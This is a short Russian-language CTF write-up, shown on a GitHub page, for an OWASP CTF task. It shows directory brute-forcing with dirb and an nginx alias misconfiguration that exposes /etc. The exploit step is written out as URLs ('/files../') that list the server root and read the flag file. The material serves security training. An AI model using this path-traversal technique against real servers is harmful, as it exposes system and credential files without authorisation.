Skip to content

Latest commit

 

History

History
30 lines (19 loc) · 641 Bytes

16.md

File metadata and controls

30 lines (19 loc) · 641 Bytes
Raw

Luhansk (16.owaspctf.gq)

На главной странице ничего полезного, запускаем dirb. Находим директорию /files которая выводит листинг /etc сервера. Читаем конфиг для nginx.

http://16.owaspctf.gq/files/nginx/conf.d/default.conf

server {
	listen 80;

	root /usr/share/nginx/html;

	index index.html;

	server_name _;

    autoindex on;

	location /files {
        alias /etc/;
    }
}

http://16.owaspctf.gq/files../ -> листинг /

http://16.owaspctf.gq/files../home/flag.txt

FLAG{NGINX_conf_its_EASY_and_Secure}